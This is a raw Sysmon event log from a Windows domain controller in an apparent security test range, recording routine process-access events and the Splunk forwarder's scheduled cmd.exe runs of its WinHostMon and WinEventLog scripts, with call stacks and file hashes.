13:36:39.390{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004054Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:39.390{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004053Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.390{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EE7-6005-D600-00000000A301}1808C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004052Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.390{59A5CD1D-8EE3-6005-B100-00000000A301}41242852C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EE7-6005-D600-00000000A301}1808C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004051Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.393{59A5CD1D-8EE7-6005-D600-00000000A301}1808C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinHostMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004050Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:39.281{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE7-6005-D500-00000000A301}4912C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004049Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.281{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004048Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:39.281{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004047Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.281{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004046Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:39.281{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004045Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.281{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004044Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:39.281{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004043Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.281{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004042Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:39.281{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004041Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.281{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004040Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:39.281{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EE7-6005-D500-00000000A301}4912C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004039Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.281{59A5CD1D-8EE3-6005-B100-00000000A301}41242852C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EE7-6005-D500-00000000A301}4912C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004038Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.282{59A5CD1D-8EE7-6005-D500-00000000A301}4912C:\Windows\System32\cmd.exe10.0.14393.0 
(rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinEventLog.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004037Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.171{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE7-6005-D400-00000000A301}4752C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004036Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:39.171{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004035Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.171{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004034Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:39.171{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004033Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.171{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004032Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:39.171{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004031Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.171{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004030Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:39.171{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004029Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 